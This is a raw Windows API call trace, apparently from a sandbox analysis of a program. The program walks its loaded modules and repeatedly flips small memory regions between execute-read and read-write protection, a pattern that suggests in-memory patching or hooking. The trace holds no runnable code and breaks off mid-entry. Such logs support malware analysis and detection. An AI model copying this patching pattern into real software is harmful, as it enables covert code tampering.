[0132.105] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990394, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.106] GetCurrentProcess () returned 0xffffffff [0132.106] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990394, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.106] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990398, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.107] GetCurrentProcess () returned 0xffffffff [0132.107] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990398, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.107] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759903c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.108] GetCurrentProcess () returned 0xffffffff [0132.108] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759903c0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.108] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990414, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.109] GetCurrentProcess () returned 0xffffffff [0132.109] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990414, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.109] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990418, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.110] GetCurrentProcess () returned 0xffffffff [0132.110] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990418, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.110] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599044c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.111] GetCurrentProcess () returned 0xffffffff [0132.111] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7599044c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.111] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990454, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.111] GetCurrentProcess () returned 0xffffffff [0132.111] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990454, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.112] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990488, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.112] GetCurrentProcess () returned 0xffffffff [0132.112] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990488, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.113] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.113] GetCurrentProcess () returned 0xffffffff [0132.113] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.113] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.114] GetCurrentProcess () returned 0xffffffff [0132.114] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.114] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.115] GetCurrentProcess () returned 0xffffffff [0132.115] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x759904e8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.115] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990528, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.115] GetCurrentProcess () returned 0xffffffff [0132.116] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75990528, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75990000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.116] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.120] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0024, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.120] GetCurrentProcess () returned 0xffffffff [0132.120] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0024, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.121] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0028, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.121] GetCurrentProcess () returned 0xffffffff [0132.121] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0028, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.121] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c002c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.122] GetCurrentProcess () returned 0xffffffff [0132.122] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c002c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.122] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0048, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.122] GetCurrentProcess () returned 0xffffffff [0132.123] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0048, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.123] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0050, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.123] GetCurrentProcess () returned 0xffffffff [0132.123] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0050, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.124] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0070, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.124] GetCurrentProcess () returned 0xffffffff [0132.124] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0070, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.124] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.125] GetCurrentProcess () returned 0xffffffff [0132.125] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.125] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.126] GetCurrentProcess () returned 0xffffffff [0132.126] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.126] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.126] GetCurrentProcess () returned 0xffffffff [0132.126] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00a8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.127] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.127] GetCurrentProcess () returned 0xffffffff [0132.127] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00b0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.127] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.128] GetCurrentProcess () returned 0xffffffff [0132.128] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00c4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.128] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.128] GetCurrentProcess () returned 0xffffffff [0132.128] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00cc, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.129] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.129] GetCurrentProcess () returned 0xffffffff [0132.129] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.129] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.130] GetCurrentProcess () returned 0xffffffff [0132.130] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c00d4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.130] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0108, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.131] GetCurrentProcess () returned 0xffffffff [0132.131] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x771c0108, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x771c0000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.131] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.133] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7582103c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.134] GetCurrentProcess () returned 0xffffffff [0132.134] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x7582103c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.134] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75821044, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.135] GetCurrentProcess () returned 0xffffffff [0132.135] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75821044, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75821000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.135] Module32Next (hSnapshot=0x124, lpme=0x28fc54) returned 1 [0132.136] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10d8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.137] GetCurrentProcess () returned 0xffffffff [0132.137] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10d8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.137] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.137] GetCurrentProcess () returned 0xffffffff [0132.137] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e0, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.138] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.138] GetCurrentProcess () returned 0xffffffff [0132.138] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10e4, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.138] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10f8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.139] GetCurrentProcess () returned 0xffffffff [0132.139] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc10f8, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.139] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1130, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.140] GetCurrentProcess () returned 0xffffffff [0132.140] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1130, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.140] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1134, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.140] GetCurrentProcess () returned 0xffffffff [0132.141] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1134, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.141] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1138, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.141] GetCurrentProcess () returned 0xffffffff [0132.141] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1138, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.142] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc113c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.142] GetCurrentProcess () returned 0xffffffff [0132.142] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc113c, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.143] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1164, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x4, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x20) returned 0x0 [0132.143] GetCurrentProcess () returned 0xffffffff [0132.143] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1164, NumberOfBytesToProtect=0x28fbf0, NewAccessProtection=0x20, OldAccessProtection=0x28fc24 | out: BaseAddress=0x28fbec*=0x75bc1000, NumberOfBytesToProtect=0x28fbf0, OldAccessProtection=0x28fc24*=0x4) returned 0x0 [0132.144] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x28fbec*=0x75bc1180, NumberOfBytesToProtect=0x28fbf0, 